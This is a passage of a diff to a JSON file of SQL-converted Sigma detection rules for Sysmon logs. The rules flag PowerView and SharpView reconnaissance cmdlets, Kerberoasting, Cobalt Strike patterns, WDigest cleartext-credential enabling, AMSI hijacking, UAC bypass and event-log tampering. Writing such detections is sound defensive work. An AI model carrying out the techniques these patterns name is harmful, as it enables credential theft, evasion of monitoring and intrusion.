OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", - "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based 
persistence method described in the reference section", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "status": "experimental", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. 
This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT 
(Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", - "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": 
"f35c5d71-b489-4e22-a115-f003df287317", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "description": "Detects UAC bypass method using Windows event viewer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - 
"filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", + "status": "experimental", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "status": 
"experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", + "status": "test", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - 
"author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Administrative scripts" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD 
(0x00000000)') AND NOT ((Image LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((Image = '') OR (Image = '')))" ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "status": "experimental", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ - "attack.execution", - 
"attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE 
'%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 